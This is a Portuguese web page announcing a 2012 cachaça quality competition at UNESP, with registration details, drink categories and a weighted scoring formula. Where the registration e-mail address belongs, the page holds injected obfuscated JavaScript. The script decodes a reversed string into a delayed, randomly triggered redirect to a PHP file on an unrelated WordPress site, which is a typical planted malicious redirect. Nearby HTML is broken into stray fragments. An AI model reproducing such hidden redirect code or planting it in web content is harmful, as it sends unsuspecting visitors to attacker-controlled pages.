V Concurso de Avaliação da Qualidade da Cachaça

tos/ix_bmcfb/image001.jpg” width=”200″ />

Caros Produtores, o V Concurso de Avaliação da Qualidade da Cachaça já esta com suas inscrições abertas, o concurso tem como objetivo premiar as melhores cachaças do ponto de vista químico e sensorial e fornecer ao produtor uma visão da posição e aceitação de seu produto dentro do conjunto de cachaças. O resultado, como das vezes anteriores será divulgado na mídia nacional e internacional. O concurso será realizado durante o IX Brazilian Meeting on Chemistry of Food and Beverages na UNESP – Universidade Estadual Paulista Júlio de Mesquita Filho de 06 a 09 de dezembro de 2012.

INSCRIÇÃO

Considerando o número crescente de inscritos, e o tempo necessário para a realização do elevado número de itens analisados, estaremos efetuando as inscrições a partir do dia 15/03/2012 no seguinte endereço:

Av. Trabalhador São-carlense, 400
São Carlos – SP
Caixa Postal 780
CEP: 13566-590
Fone/Fax: (16) 3373-9976.

A data final para as inscrições será 30/08/2012.

Cada produtor que deseje se inscrever deverá enviar um e-mail para $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tos/ix_bmcfb/quest_ix_bmcfb.doc”>aqui (clique para download).

MODALIDADES

As modalidades das cachaças a serem avaliadas, são as seguintes:

1)    Descansada ou repousada: cachaça armazenada por um período de até três (3) meses em tonéis de mais de 500 L de capacidade.
O produtor deverá informar se adicionou ou não açúcar na sua bebida.

2)    Envelhecida: cachaça armazenada em tonéis de madeira de até 250 L por período igual ou superior a um (1) ano.

O produtor deverá no ato da inscrição e ao preencher o questionário, informar se adicionou caramelo e/ou açúcar na sua bebida e qual o teor do mesmo, qual a madeira e as dimensões do tonel, o tempo de envelhecimento, o volume da produção e o equipamento utilizado para a destilação: alambique ou coluna.

Todo produtor deverá informar se a sua cachaça foi produzida com cana queimada ou crua, se adicionou uréia durante a fermentação e também se é uma cachaça bidestilada ou simples.

REGULAMENTO

As cachaças serão avaliadas e premiadas nas categorias ouro, prata e bronze.
Aos três (3) primeiros colocados em cada categoria, serão distribuídas medalhas alusivas ao fato respectivamente para o primeiro, segundo e terceiro lugares.
A premiação será consequência de uma avaliação considerando a análise química e análise sensorial com os respectivos pesos:
Análise Química, peso 5.
Análise Sensorial (para painel de degustadores) I, peso 2,5.
Análise Sensorial (para o público participante) II, peso 2,5.
As cachaças cujos resultados das análises químicas não estiverem em conformidade com a legislação brasileira em vigor serão penalizadas; somente as cachaças que forem aprovadas na análise química serão submetidas à análise sensorial.
O resultado final será obtido pela média aritmética ponderada das notas, atribuídas a cada bebida de acordo com:

M= 5xAQ+2,5xASD+2,5xASP / 10

Onde:
AQ= análise química
ASD=análise sensorial de degustadores
ASP=análise sensorial do público participante.

*Os degustadores credenciados participarão apenas da avaliação sensorial ASD.
O painel destes degustadores será estabelecido previamente pela comissão julgadora, de um grupo que efetuará treinamento prévio com profissional altamente qualificado.
Serão fornecidos a todos os produtores o laudo das análises químicas e o certificado de participação.

Ao produtor será garantido o sigilo absoluto dos resultados de suas análises.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.